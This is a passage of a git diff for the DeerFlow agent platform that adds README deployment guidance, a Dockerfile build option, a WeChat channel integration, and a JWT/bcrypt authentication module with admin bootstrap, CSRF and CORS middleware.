1. Create a bot on the WeCom AI Bot platform and obtain the `bot_id` and `bot_secret`.
|
||||
|
||||
@@ -40,6 +40,7 @@ https://github.com/user-attachments/assets/a8bcadc4-e040-4cf2-8fda-dd768b999c18
|
||||
- [快速开始](#快速开始)
|
||||
- [配置](#配置)
|
||||
- [运行应用](#运行应用)
|
||||
- [部署建议与资源规划](#部署建议与资源规划)
|
||||
- [方式一:Docker(推荐)](#方式一docker推荐)
|
||||
- [方式二:本地开发](#方式二本地开发)
|
||||
- [进阶配置](#进阶配置)
|
||||
@@ -150,6 +151,20 @@ https://github.com/user-attachments/assets/a8bcadc4-e040-4cf2-8fda-dd768b999c18
|
||||
|
||||
### 运行应用
|
||||
|
||||
#### 部署建议与资源规划
|
||||
|
||||
可以先按下面的资源档位来选择 DeerFlow 的运行方式:
|
||||
|
||||
| 部署场景 | 起步配置 | 推荐配置 | 说明 |
|
||||
|---------|-----------|------------|-------|
|
||||
| 本地体验 / `make dev` | 4 vCPU、8 GB 内存、20 GB SSD 可用空间 | 8 vCPU、16 GB 内存 | 适合单个开发者或单个轻量会话,且模型走外部 API。`2 核 / 4 GB` 通常跑不稳。 |
|
||||
| Docker 开发 / `make docker-start` | 4 vCPU、8 GB 内存、25 GB SSD 可用空间 | 8 vCPU、16 GB 内存 | 镜像构建、源码挂载和 sandbox 容器都会比纯本地模式更吃资源。 |
|
||||
| 长期运行服务 / `make up` | 8 vCPU、16 GB 内存、40 GB SSD 可用空间 | 16 vCPU、32 GB 内存 | 更适合共享环境、多 agent 任务、报告生成或更重的 sandbox 负载。 |
|
||||
|
||||
- 上面的配置只覆盖 DeerFlow 本身;如果你还要本机部署本地大模型,请单独为模型服务预留资源。
|
||||
- 持续运行的服务更推荐使用 Linux + Docker。macOS 和 Windows 更适合作为开发机或体验环境。
|
||||
- 如果 CPU 或内存长期打满,先降低并发会话或重任务数量,再考虑升级到更高一档配置。
|
||||
|
||||
#### 方式一:Docker(推荐)
|
||||
|
||||
**开发模式**(支持热更新,挂载源码):
|
||||
|
||||
+7
-5
@@ -395,14 +395,16 @@ Both can be modified at runtime via Gateway API endpoints or `DeerFlowClient` me
|
||||
**Architecture**: Imports the same `deerflow` modules that LangGraph Server and Gateway API use. Shares the same config files and data directories. No FastAPI dependency.
|
||||
|
||||
**Agent Conversation** (replaces LangGraph Server):
|
||||
- `chat(message, thread_id)` — synchronous, returns final text
|
||||
- `stream(message, thread_id)` — yields `StreamEvent` aligned with LangGraph SSE protocol:
|
||||
- `"values"` — full state snapshot (title, messages, artifacts)
|
||||
- `"messages-tuple"` — per-message update (AI text, tool calls, tool results)
|
||||
- `"end"` — stream finished
|
||||
- `chat(message, thread_id)` — synchronous, accumulates streaming deltas per message-id and returns the final AI text
|
||||
- `stream(message, thread_id)` — subscribes to LangGraph `stream_mode=["values", "messages", "custom"]` and yields `StreamEvent`:
|
||||
- `"values"` — full state snapshot (title, messages, artifacts); AI text already delivered via `messages` mode is **not** re-synthesized here to avoid duplicate deliveries
|
||||
- `"messages-tuple"` — per-chunk update: for AI text this is a **delta** (concat per `id` to rebuild the full message); tool calls and tool results are emitted once each
|
||||
- `"custom"` — forwarded from `StreamWriter`
|
||||
- `"end"` — stream finished (carries cumulative `usage` counted once per message id)
|
||||
- Agent created lazily via `create_agent()` + `_build_middlewares()`, same as `make_lead_agent`
|
||||
- Supports `checkpointer` parameter for state persistence across turns
|
||||
- `reset_agent()` forces agent recreation (e.g. after memory or skill changes)
|
||||
- See [docs/STREAMING.md](docs/STREAMING.md) for the full design: why Gateway and DeerFlowClient are parallel paths, LangGraph's `stream_mode` semantics, the per-id dedup invariants, and regression testing strategy
|
||||
|
||||
**Gateway Equivalent Methods** (replaces Gateway API):
|
||||
|
||||
|
||||
+6
-2
@@ -13,6 +13,9 @@ FROM python:3.12-slim-bookworm AS builder
|
||||
ARG NODE_MAJOR=22
|
||||
ARG APT_MIRROR
|
||||
ARG UV_INDEX_URL
|
||||
# Optional extras to install (e.g. "postgres" for PostgreSQL support)
|
||||
# Usage: docker build --build-arg UV_EXTRAS=postgres ...
|
||||
ARG UV_EXTRAS
|
||||
|
||||
# Optionally override apt mirror for restricted networks (e.g. APT_MIRROR=mirrors.aliyun.com)
|
||||
RUN if [ -n "${APT_MIRROR}" ]; then \
|
||||
@@ -43,8 +46,9 @@ WORKDIR /app
|
||||
COPY backend ./backend
|
||||
|
||||
# Install dependencies with cache mount
|
||||
# When UV_EXTRAS is set (e.g. "postgres"), installs optional dependencies.
|
||||
RUN --mount=type=cache,target=/root/.cache/uv \
|
||||
sh -c "cd backend && UV_INDEX_URL=${UV_INDEX_URL:-https://pypi.org/simple} uv sync"
|
||||
sh -c "cd backend && UV_INDEX_URL=${UV_INDEX_URL:-https://pypi.org/simple} uv sync ${UV_EXTRAS:+--extra $UV_EXTRAS}"
|
||||
|
||||
# ── Stage 2: Dev ──────────────────────────────────────────────────────────────
|
||||
# Retains compiler toolchain from builder so startup-time `uv sync` can build
|
||||
@@ -84,4 +88,4 @@ COPY --from=builder /app/backend ./backend
|
||||
EXPOSE 8001 2024
|
||||
|
||||
# Default command (can be overridden in docker-compose)
|
||||
CMD ["sh", "-c", "cd backend && PYTHONPATH=. uv run uvicorn app.gateway.app:app --host 0.0.0.0 --port 8001"]
|
||||
CMD ["sh", "-c", "cd backend && PYTHONPATH=. uv run --no-sync uvicorn app.gateway.app:app --host 0.0.0.0 --port 8001"]
|
||||
|
||||
@@ -8,6 +8,7 @@ import mimetypes
|
||||
import re
|
||||
import time
|
||||
from collections.abc import Awaitable, Callable, Mapping
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
import httpx
|
||||
@@ -37,6 +38,7 @@ CHANNEL_CAPABILITIES = {
|
||||
"feishu": {"supports_streaming": True},
|
||||
"slack": {"supports_streaming": False},
|
||||
"telegram": {"supports_streaming": False},
|
||||
"wechat": {"supports_streaming": False},
|
||||
"wecom": {"supports_streaming": True},
|
||||
}
|
||||
|
||||
@@ -78,7 +80,24 @@ async def _read_wecom_inbound_file(file_info: dict[str, Any], client: httpx.Asyn
|
||||
return decrypt_file(data, aeskey)
|
||||
|
||||
|
||||
async def _read_wechat_inbound_file(file_info: dict[str, Any], client: httpx.AsyncClient) -> bytes | None:
|
||||
raw_path = file_info.get("path")
|
||||
if isinstance(raw_path, str) and raw_path.strip():
|
||||
try:
|
||||
return await asyncio.to_thread(Path(raw_path).read_bytes)
|
||||
except OSError:
|
||||
logger.exception("[Manager] failed to read WeChat inbound file from local path: %s", raw_path)
|
||||
return None
|
||||
|
||||
full_url = file_info.get("full_url")
|
||||
if isinstance(full_url, str) and full_url.strip():
|
||||
return await _read_http_inbound_file({"url": full_url}, client)
|
||||
|
||||
return None
|
||||
|
||||
|
||||
register_inbound_file_reader("wecom", _read_wecom_inbound_file)
|
||||
register_inbound_file_reader("wechat", _read_wechat_inbound_file)
|
||||
|
||||
|
||||
class InvalidChannelSessionConfigError(ValueError):
|
||||
|
||||
@@ -18,6 +18,7 @@ _CHANNEL_REGISTRY: dict[str, str] = {
|
||||
"feishu": "app.channels.feishu:FeishuChannel",
|
||||
"slack": "app.channels.slack:SlackChannel",
|
||||
"telegram": "app.channels.telegram:TelegramChannel",
|
||||
"wechat": "app.channels.wechat:WechatChannel",
|
||||
"wecom": "app.channels.wecom:WeComChannel",
|
||||
}
|
||||
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
+161
-1
@@ -1,16 +1,23 @@
|
||||
import logging
|
||||
import os
|
||||
from collections.abc import AsyncGenerator
|
||||
from contextlib import asynccontextmanager
|
||||
from datetime import UTC
|
||||
|
||||
from fastapi import FastAPI
|
||||
from fastapi.middleware.cors import CORSMiddleware
|
||||
|
||||
from app.gateway.auth_middleware import AuthMiddleware
|
||||
from app.gateway.config import get_gateway_config
|
||||
from app.gateway.csrf_middleware import CSRFMiddleware
|
||||
from app.gateway.deps import langgraph_runtime
|
||||
from app.gateway.routers import (
|
||||
agents,
|
||||
artifacts,
|
||||
assistants_compat,
|
||||
auth,
|
||||
channels,
|
||||
feedback,
|
||||
mcp,
|
||||
memory,
|
||||
models,
|
||||
@@ -33,6 +40,125 @@ logging.basicConfig(
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
async def _ensure_admin_user(app: FastAPI) -> None:
|
||||
"""Auto-create the admin user on first boot if no users exist.
|
||||
|
||||
After admin creation, migrate orphan threads from the LangGraph
|
||||
store (metadata.owner_id unset) to the admin account. This is the
|
||||
"no-auth → with-auth" upgrade path: users who ran DeerFlow without
|
||||
authentication have existing LangGraph thread data that needs an
|
||||
owner assigned.
|
||||
|
||||
No SQL persistence migration is needed: the four owner_id columns
|
||||
(threads_meta, runs, run_events, feedback) only come into existence
|
||||
alongside the auth module via create_all, so freshly created tables
|
||||
never contain NULL-owner rows. "Existing persistence DB + new auth"
|
||||
is not a supported upgrade path — fresh install or wipe-and-retry.
|
||||
|
||||
Multi-worker safe: relies on SQLite UNIQUE constraint to resolve
|
||||
races during admin creation. Only the worker that successfully
|
||||
creates/updates the admin prints the password; losers silently skip.
|
||||
"""
|
||||
import secrets
|
||||
|
||||
from app.gateway.auth.credential_file import write_initial_credentials
|
||||
from app.gateway.deps import get_local_provider
|
||||
|
||||
def _announce_credentials(email: str, password: str, *, label: str, headline: str) -> None:
|
||||
"""Write the password to a 0600 file and log the path (never the secret)."""
|
||||
cred_path = write_initial_credentials(email, password, label=label)
|
||||
logger.info("=" * 60)
|
||||
logger.info(" %s", headline)
|
||||
logger.info(" Credentials written to: %s (mode 0600)", cred_path)
|
||||
logger.info(" Change it after login: Settings -> Account")
|
||||
logger.info("=" * 60)
|
||||
|
||||
provider = get_local_provider()
|
||||
user_count = await provider.count_users()
|
||||
|
||||
admin = None
|
||||
|
||||
if user_count == 0:
|
||||
password = secrets.token_urlsafe(16)
|
||||
try:
|
||||
admin = await provider.create_user(email="admin@deerflow.dev", password=password, system_role="admin", needs_setup=True)
|
||||
except ValueError:
|
||||
return # Another worker already created the admin.
|
||||
_announce_credentials(admin.email, password, label="initial", headline="Admin account created on first boot")
|
||||
else:
|
||||
# Admin exists but setup never completed — reset password so operator
|
||||
# can always find it in the console without needing the CLI.
|
||||
# Multi-worker guard: if admin was created less than 30s ago, another
|
||||
# worker just created it and will print the password — skip reset.
|
||||
admin = await provider.get_user_by_email("admin@deerflow.dev")
|
||||
if admin and admin.needs_setup:
|
||||
import time
|
||||
|
||||
age = time.time() - admin.created_at.replace(tzinfo=UTC).timestamp()
|
||||
if age >= 30:
|
||||
from app.gateway.auth.password import hash_password_async
|
||||
|
||||
password = secrets.token_urlsafe(16)
|
||||
admin.password_hash = await hash_password_async(password)
|
||||
admin.token_version += 1
|
||||
await provider.update_user(admin)
|
||||
_announce_credentials(admin.email, password, label="reset", headline="Admin account setup incomplete — password reset")
|
||||
|
||||
if admin is None:
|
||||
return # Nothing to bind orphans to.
|
||||
|
||||
admin_id = str(admin.id)
|
||||
|
||||
# LangGraph store orphan migration — non-fatal.
|
||||
# This covers the "no-auth → with-auth" upgrade path for users
|
||||
# whose existing LangGraph thread metadata has no owner_id set.
|
||||
store = getattr(app.state, "store", None)
|
||||
if store is not None:
|
||||
try:
|
||||
migrated = await _migrate_orphaned_threads(store, admin_id)
|
||||
if migrated:
|
||||
logger.info("Migrated %d orphan LangGraph thread(s) to admin", migrated)
|
||||
except Exception:
|
||||
logger.exception("LangGraph thread migration failed (non-fatal)")
|
||||
|
||||
|
||||
async def _iter_store_items(store, namespace, *, page_size: int = 500):
|
||||
"""Paginated async iterator over a LangGraph store namespace.
|
||||
|
||||
Replaces the old hardcoded ``limit=1000`` call with a cursor-style
|
||||
loop so that environments with more than one page of orphans do
|
||||
not silently lose data. Terminates when a page is empty OR when a
|
||||
short page arrives (indicating the last page).
|
||||
"""
|
||||
offset = 0
|
||||
while True:
|
||||
batch = await store.asearch(namespace, limit=page_size, offset=offset)
|
||||
if not batch:
|
||||
return
|
||||
for item in batch:
|
||||
yield item
|
||||
if len(batch) < page_size:
|
||||
return
|
||||
offset += page_size
|
||||
|
||||
|
||||
async def _migrate_orphaned_threads(store, admin_user_id: str) -> int:
|
||||
"""Migrate LangGraph store threads with no owner_id to the given admin.
|
||||
|
||||
Uses cursor pagination so all orphans are migrated regardless of
|
||||
count. Returns the number of rows migrated.
|
||||
"""
|
||||
migrated = 0
|
||||
async for item in _iter_store_items(store, ("threads",)):
|
||||
metadata = item.value.get("metadata", {})
|
||||
if not metadata.get("owner_id"):
|
||||
metadata["owner_id"] = admin_user_id
|
||||
item.value["metadata"] = metadata
|
||||
await store.aput(("threads",), item.key, item.value)
|
||||
migrated += 1
|
||||
return migrated
|
||||
|
||||
|
||||
@asynccontextmanager
|
||||
async def lifespan(app: FastAPI) -> AsyncGenerator[None, None]:
|
||||
"""Application lifespan handler."""
|
||||
@@ -52,6 +178,10 @@ async def lifespan(app: FastAPI) -> AsyncGenerator[None, None]:
|
||||
async with langgraph_runtime(app):
|
||||
logger.info("LangGraph runtime initialised")
|
||||
|
||||
# Ensure admin user exists (auto-create on first boot)
|
||||
# Must run AFTER langgraph_runtime so app.state.store is available for thread migration
|
||||
await _ensure_admin_user(app)
|
||||
|
||||
# Start IM channel service if any channels are configured
|
||||
try:
|
||||
from app.channels.service import start_channel_service
|
||||
@@ -163,7 +293,31 @@ This gateway provides custom endpoints for models, MCP configuration, skills, an
|
||||
],
|
||||
)
|
||||
|
||||
# CORS is handled by nginx - no need for FastAPI middleware
|
||||
# Auth: reject unauthenticated requests to non-public paths (fail-closed safety net)
|
||||
app.add_middleware(AuthMiddleware)
|
||||
|
||||
# CSRF: Double Submit Cookie pattern for state-changing requests
|
||||
app.add_middleware(CSRFMiddleware)
|
||||
|
||||
# CORS: when GATEWAY_CORS_ORIGINS is set (dev without nginx), add CORS middleware.
|
||||
# In production, nginx handles CORS and no middleware is needed.
|
||||
cors_origins_env = os.environ.get("GATEWAY_CORS_ORIGINS", "")
|
||||
if cors_origins_env:
|
||||
cors_origins = [o.strip() for o in cors_origins_env.split(",") if o.strip()]
|
||||
# Validate: wildcard origin with credentials is a security misconfiguration
|
||||
for origin in cors_origins:
|
||||
if origin == "*":
|
||||
logger.error("GATEWAY_CORS_ORIGINS contains wildcard '*' with allow_credentials=True. This is a security misconfiguration — browsers will reject the response. Use explicit scheme://host:port origins instead.")
|
||||
cors_origins = [o for o in cors_origins if o != "*"]
|
||||
break
|
||||
if cors_origins:
|
||||
app.add_middleware(
|
||||
CORSMiddleware,
|
||||
allow_origins=cors_origins,
|
||||
allow_credentials=True,
|
||||
allow_methods=["*"],
|
||||
allow_headers=["*"],
|
||||
)
|
||||
|
||||
# Include routers
|
||||
# Models API is mounted at /api/models
|
||||
@@ -199,6 +353,12 @@ This gateway provides custom endpoints for models, MCP configuration, skills, an
|
||||
# Assistants compatibility API (LangGraph Platform stub)
|
||||
app.include_router(assistants_compat.router)
|
||||
|
||||
# Auth API is mounted at /api/v1/auth
|
||||
app.include_router(auth.router)
|
||||
|
||||
# Feedback API is mounted at /api/threads/{thread_id}/runs/{run_id}/feedback
|
||||
app.include_router(feedback.router)
|
||||
|
||||
# Thread Runs API (LangGraph Platform-compatible runs lifecycle)
|
||||
app.include_router(thread_runs.router)
|
||||
|
||||
|
||||
@@ -0,0 +1,42 @@
|
||||
"""Authentication module for DeerFlow.
|
||||
|
||||
This module provides:
|
||||
- JWT-based authentication
|
||||
- Provider Factory pattern for extensible auth methods
|
||||
- UserRepository interface for storage backends (SQLite)
|
||||
"""
|
||||
|
||||
from app.gateway.auth.config import AuthConfig, get_auth_config, set_auth_config
|
||||
from app.gateway.auth.errors import AuthErrorCode, AuthErrorResponse, TokenError
|
||||
from app.gateway.auth.jwt import TokenPayload, create_access_token, decode_token
|
||||
from app.gateway.auth.local_provider import LocalAuthProvider
|
||||
from app.gateway.auth.models import User, UserResponse
|
||||
from app.gateway.auth.password import hash_password, verify_password
|
||||
from app.gateway.auth.providers import AuthProvider
|
||||
from app.gateway.auth.repositories.base import UserRepository
|
||||
|
||||
__all__ = [
|
||||
# Config
|
||||
"AuthConfig",
|
||||
"get_auth_config",
|
||||
"set_auth_config",
|
||||
# Errors
|
||||
"AuthErrorCode",
|
||||
"AuthErrorResponse",
|
||||
"TokenError",
|
||||
# JWT
|
||||
"TokenPayload",
|
||||
"create_access_token",
|
||||
"decode_token",
|
||||
# Password
|
||||
"hash_password",
|
||||
"verify_password",
|
||||
# Models
|
||||
"User",
|
||||
"UserResponse",
|
||||
# Providers
|
||||
"AuthProvider",
|
||||
"LocalAuthProvider",
|
||||
# Repository
|
||||
"UserRepository",
|
||||
]
|
||||
@@ -0,0 +1,57 @@
|
||||
"""Authentication configuration for DeerFlow."""
|
||||
|
||||
import logging
|
||||
import os
|
||||
import secrets
|
||||
|
||||
from dotenv import load_dotenv
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
load_dotenv()
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class AuthConfig(BaseModel):
|
||||
"""JWT and auth-related configuration. Parsed once at startup.
|
||||
|
||||
Note: the ``users`` table now lives in the shared persistence
|
||||
database managed by ``deerflow.persistence.engine``. The old
|
||||
``users_db_path`` config key has been removed — user storage is
|
||||
configured through ``config.database`` like every other table.
|
||||
"""
|
||||
|
||||
jwt_secret: str = Field(
|
||||
...,
|
||||
description="Secret key for JWT signing. MUST be set via AUTH_JWT_SECRET.",
|
||||
)
|
||||
token_expiry_days: int = Field(default=7, ge=1, le=30)
|
||||
oauth_github_client_id: str | None = Field(default=None)
|
||||
oauth_github_client_secret: str | None = Field(default=None)
|
||||
|
||||
|
||||
_auth_config: AuthConfig | None = None
|
||||
|
||||
|
||||
def get_auth_config() -> AuthConfig:
|
||||
"""Get the global AuthConfig instance. Parses from env on first call."""
|
||||
global _auth_config
|
||||
if _auth_config is None:
|
||||
jwt_secret = os.environ.get("AUTH_JWT_SECRET")
|
||||
if not jwt_secret:
|
||||
jwt_secret = secrets.token_urlsafe(32)
|
||||
os.environ["AUTH_JWT_SECRET"] = jwt_secret
|
||||
logger.warning(
|
||||
"⚠ AUTH_JWT_SECRET is not set — using an auto-generated ephemeral secret. "
|
||||
"Sessions will be invalidated on restart. "
|
||||
"For production, add AUTH_JWT_SECRET to your .env file: "
|
||||
'python -c "import secrets; print(secrets.token_urlsafe(32))"'
|
||||
)
|
||||
_auth_config = AuthConfig(jwt_secret=jwt_secret)
|
||||
return _auth_config
|
||||
|
||||
|
||||
def set_auth_config(config: AuthConfig) -> None:
|
||||
"""Set the global AuthConfig instance (for testing)."""
|
||||
global _auth_config
|
||||
_auth_config = config
|
||||
@@ -0,0 +1,48 @@
|
||||
"""Write initial admin credentials to a restricted file instead of logs.
|
||||
|
||||
Logging secrets to stdout/stderr is a well-known CodeQL finding
|
||||
(py/clear-text-logging-sensitive-data) — in production those logs
|
||||
get collected into ELK/Splunk/etc and become a secret sprawl
|
||||
source. This helper writes the credential to a 0600 file that only
|
||||
the process user can read, and returns the path so the caller can
|
||||
log **the path** (not the password) for the operator to pick up.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
from pathlib import Path
|
||||
|
||||
from deerflow.config.paths import get_paths
|
||||
|
||||
_CREDENTIAL_FILENAME = "admin_initial_credentials.txt"
|
||||
|
||||
|
||||
def write_initial_credentials(email: str, password: str, *, label: str = "initial") -> Path:
|
||||
"""Write the admin email + password to ``{base_dir}/admin_initial_credentials.txt``.
|
||||
|
||||
The file is created **atomically** with mode 0600 via ``os.open``
|
||||
so the password is never world-readable, even for the single syscall
|
||||
window between ``write_text`` and ``chmod``.
|
||||
|
||||
``label`` distinguishes "initial" (fresh creation) from "reset"
|
||||
(password reset) in the file header so an operator picking up the
|
||||
file after a restart can tell which event produced it.
|
||||
|
||||
Returns the absolute :class:`Path` to the file.
|
||||
"""
|
||||
target = get_paths().base_dir / _CREDENTIAL_FILENAME
|
||||
target.parent.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
content = (
|
||||
f"# DeerFlow admin {label} credentials\n# This file is generated on first boot or password reset.\n# Change the password after login via Settings -> Account,\n# then delete this file.\n#\nemail: {email}\npassword: {password}\n"
|
||||
)
|
||||
|
||||
# Atomic 0600 create-or-truncate. O_TRUNC (not O_EXCL) so the
|
||||
# reset-password path can rewrite an existing file without a
|
||||
# separate unlink-then-create dance.
|
||||
fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
|
||||
with os.fdopen(fd, "w", encoding="utf-8") as fh:
|
||||
fh.write(content)
|
||||
|
||||
return target.resolve()
|
||||
@@ -0,0 +1,44 @@
|
||||
"""Typed error definitions for auth module.
|
||||
|
||||
AuthErrorCode: exhaustive enum of all auth failure conditions.
|
||||
TokenError: exhaustive enum of JWT decode failures.
|
||||
AuthErrorResponse: structured error payload for HTTP responses.
|
||||
"""
|
||||
|
||||
from enum import StrEnum
|
||||
|
||||
from pydantic import BaseModel
|
||||
|
||||
|
||||
class AuthErrorCode(StrEnum):
|
||||
"""Exhaustive list of auth error conditions."""
|
||||
|
||||
INVALID_CREDENTIALS = "invalid_credentials"
|
||||
TOKEN_EXPIRED = "token_expired"
|
||||
TOKEN_INVALID = "token_invalid"
|
||||
USER_NOT_FOUND = "user_not_found"
|
||||
EMAIL_ALREADY_EXISTS = "email_already_exists"
|
||||
PROVIDER_NOT_FOUND = "provider_not_found"
|
||||
NOT_AUTHENTICATED = "not_authenticated"
|
||||
|
||||
|
||||
class TokenError(StrEnum):
|
||||
"""Exhaustive list of JWT decode failure reasons."""
|
||||
|
||||
EXPIRED = "expired"
|
||||
INVALID_SIGNATURE = "invalid_signature"
|
||||
MALFORMED = "malformed"
|
||||
|
||||
|
||||
class AuthErrorResponse(BaseModel):
|
||||
"""Structured error response — replaces bare `detail` strings."""
|
||||
|
||||
code: AuthErrorCode
|
||||
message: str
|
||||
|
||||
|
||||
def token_error_to_code(err: TokenError) -> AuthErrorCode:
|
||||
"""Map TokenError to AuthErrorCode — single source of truth."""
|
||||
if err == TokenError.EXPIRED:
|
||||
return AuthErrorCode.TOKEN_EXPIRED
|
||||
return AuthErrorCode.TOKEN_INVALID
|
||||
@@ -0,0 +1,55 @@
|
||||
"""JWT token creation and verification."""
|
||||
|
||||
from datetime import UTC, datetime, timedelta
|
||||
|
||||
import jwt
|
||||
from pydantic import BaseModel
|
||||
|
||||
from app.gateway.auth.config import get_auth_config
|
||||
from app.gateway.auth.errors import TokenError
|
||||
|
||||
|
||||
class TokenPayload(BaseModel):
|
||||
"""JWT token payload."""
|
||||
|
||||
sub: str # user_id
|
||||
exp: datetime
|
||||
iat: datetime | None = None
|
||||
ver: int = 0 # token_version — must match User.token_version
|
||||
|
||||
|
||||
def create_access_token(user_id: str, expires_delta: timedelta | None = None, token_version: int = 0) -> str:
|
||||
"""Create a JWT access token.
|
||||
|
||||
Args:
|
||||
user_id: The user's UUID as string
|
||||
expires_delta: Optional custom expiry, defaults to 7 days
|
||||
token_version: User's current token_version for invalidation
|
||||
|
||||
Returns:
|
||||
Encoded JWT string
|
||||
"""
|
||||
config = get_auth_config()
|
||||
expiry = expires_delta or timedelta(days=config.token_expiry_days)
|
||||
|
||||
now = datetime.now(UTC)
|
||||
payload = {"sub": user_id, "exp": now + expiry, "iat": now, "ver": token_version}
|
||||
return jwt.encode(payload, config.jwt_secret, algorithm="HS256")
|
||||
|
||||
|
||||
def decode_token(token: str) -> TokenPayload | TokenError:
|
||||
"""Decode and validate a JWT token.
|
||||
|
||||
Returns:
|
||||
TokenPayload if valid, or a specific TokenError variant.
|
||||
"""
|
||||
config = get_auth_config()
|
||||
try:
|
||||
payload = jwt.decode(token, config.jwt_secret, algorithms=["HS256"])
|
||||
return TokenPayload(**payload)
|
||||
except jwt.ExpiredSignatureError:
|
||||
return TokenError.EXPIRED
|
||||
except jwt.InvalidSignatureError:
|
||||
return TokenError.INVALID_SIGNATURE
|
||||
except jwt.PyJWTError:
|
||||
return TokenError.MALFORMED
|
||||
@@ -0,0 +1,87 @@
|
||||
"""Local email/password authentication provider."""
|
||||
|
||||
from app.gateway.auth.models import User
|
||||
from app.gateway.auth.password import hash_password_async, verify_password_async
|
||||
from app.gateway.auth.providers import AuthProvider
|
||||
from app.gateway.auth.repositories.base import UserRepository
|
||||
|
||||
|
||||
class LocalAuthProvider(AuthProvider):
|
||||
"""Email/password authentication provider using local database."""
|
||||
|
||||
def __init__(self, repository: UserRepository):
|
||||
"""Initialize with a UserRepository.
|
||||
|
||||
Args:
|
||||
repository: UserRepository implementation (SQLite)
|
||||
"""
|
||||
self._repo = repository
|
||||
|
||||
async def authenticate(self, credentials: dict) -> User | None:
|
||||
"""Authenticate with email and password.
|
||||
|
||||
Args:
|
||||
credentials: dict with 'email' and 'password' keys
|
||||
|
||||
Returns:
|
||||
User if authentication succeeds, None otherwise
|
||||
"""
|
||||
email = credentials.get("email")
|
||||
password = credentials.get("password")
|
||||
|
||||
if not email or not password:
|
||||
return None
|
||||
|
||||
user = await self._repo.get_user_by_email(email)
|
||||
if user is None:
|
||||
return None
|
||||
|
||||
if user.password_hash is None:
|
||||
# OAuth user without local password
|
||||
return None
|
||||
|
||||
if not await verify_password_async(password, user.password_hash):
|
||||
return None
|
||||
|
||||
return user
|
||||
|
||||
async def get_user(self, user_id: str) -> User | None:
|
||||
"""Get user by ID."""
|
||||
return await self._repo.get_user_by_id(user_id)
|
||||
|
||||
async def create_user(self, email: str, password: str | None = None, system_role: str = "user", needs_setup: bool = False) -> User:
|
||||
"""Create a new local user.
|
||||
|
||||
Args:
|
||||
email: User email address
|
||||
password: Plain text password (will be hashed)
|
||||
system_role: Role to assign ("admin" or "user")
|
||||
needs_setup: If True, user must complete setup on first login
|
||||
|
||||
Returns:
|
||||
Created User instance
|
||||
"""
|
||||
password_hash = await hash_password_async(password) if password else None
|
||||
user = User(
|
||||
email=email,
|
||||
password_hash=password_hash,
|
||||
system_role=system_role,
|
||||
needs_setup=needs_setup,
|
||||
)
|
||||
return await self._repo.create_user(user)
|
||||
|
||||
async def get_user_by_oauth(self, provider: str, oauth_id: str) -> User | None:
|
||||
"""Get user by OAuth provider and ID."""
|
||||
return await self._repo.get_user_by_oauth(provider, oauth_id)
|
||||
|
||||
async def count_users(self) -> int:
|
||||
"""Return total number of registered users."""
|
||||
return await self._repo.count_users()
|
||||
|
||||
async def update_user(self, user: User) -> User:
|
||||
"""Update an existing user."""
|
||||
return await self._repo.update_user(user)
|
||||
|
||||
async def get_user_by_email(self, email: str) -> User | None:
|
||||
"""Get user by email."""
|
||||
return await self._repo.get_user_by_email(email)
|
||||
@@ -0,0 +1,41 @@
|
||||
"""User Pydantic models for authentication."""
|
||||
|
||||
from datetime import UTC, datetime
|
||||
from typing import Literal
|
||||
from uuid import UUID, uuid4
|
||||
|
||||
from pydantic import BaseModel, ConfigDict, EmailStr, Field
|
||||
|
||||
|
||||
def _utc_now() -> datetime:
|
||||
"""Return current UTC time (timezone-aware)."""
|
||||
return datetime.now(UTC)
|
||||
|
||||
|
||||
class User(BaseModel):
|
||||
"""Internal user representation."""
|
||||
|
||||
model_config = ConfigDict(from_attributes=True)
|
||||
|
||||
id: UUID = Field(default_factory=uuid4, description="Primary key")
|
||||
email: EmailStr = Field(..., description="Unique email address")
|
||||
password_hash: str | None = Field(None, description="bcrypt hash, nullable for OAuth users")
|
||||
system_role: Literal["admin", "user"] = Field(default="user")
|
||||
created_at: datetime = Field(default_factory=_utc_now)
|
||||
|
||||
# OAuth linkage (optional)
|
||||
oauth_provider: str | None = Field(None, description="e.g. 'github', 'google'")
|
||||
oauth_id: str | None = Field(None, description="User ID from OAuth provider")
|
||||
|
||||
# Auth lifecycle
|
||||
needs_setup: bool = Field(default=False, description="True for auto-created admin until setup completes")
|
||||
token_version: int = Field(default=0, description="Incremented on password change to invalidate old JWTs")
|
||||
|
||||
|
||||
class UserResponse(BaseModel):
|
||||
"""Response model for user info endpoint."""
|
||||
|
||||
id: str
|
||||
email: str
|
||||
system_role: Literal["admin", "user"]
|
||||
needs_setup: bool = False
|
||||
@@ -0,0 +1,33 @@
|
||||
"""Password hashing utilities using bcrypt directly."""
|
||||
|
||||
import asyncio
|
||||
|
||||
import bcrypt
|
||||
|
||||
|
||||
def hash_password(password: str) -> str:
|
||||
"""Hash a password using bcrypt."""
|
||||
return bcrypt.hashpw(password.encode("utf-8"), bcrypt.gensalt()).decode("utf-8")
|
||||
|
||||
|
||||
def verify_password(plain_password: str, hashed_password: str) -> bool:
|
||||
"""Verify a password against its hash."""
|
||||
return bcrypt.checkpw(plain_password.encode("utf-8"), hashed_password.encode("utf-8"))
|
||||
|
||||
|
||||
async def hash_password_async(password: str) -> str:
|
||||
"""Hash a password using bcrypt (non-blocking).
|
||||
|
||||
Wraps the blocking bcrypt operation in a thread pool to avoid
|
||||
blocking the event loop during password hashing.
|
||||
"""
|
||||
return await asyncio.to_thread(hash_password, password)
|
||||
|
||||
|
||||
async def verify_password_async(plain_password: str, hashed_password: str) -> bool:
|
||||
"""Verify a password against its hash (non-blocking).
|
||||
|
||||
Wraps the blocking bcrypt operation in a thread pool to avoid
|
||||
blocking the event loop during password verification.
|
||||
"""
|
||||
return await asyncio.to_thread(verify_password, plain_password, hashed_password)
|
||||
@@ -0,0 +1,24 @@
|
||||
"""Auth provider abstraction."""
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
|
||||
|
||||
class AuthProvider(ABC):
|
||||
"""Abstract base class for authentication providers."""
|
||||
|
||||
@abstractmethod
|
||||
async def authenticate(self, credentials: dict) -> "User | None":
|
||||
"""Authenticate user with given credentials.
|
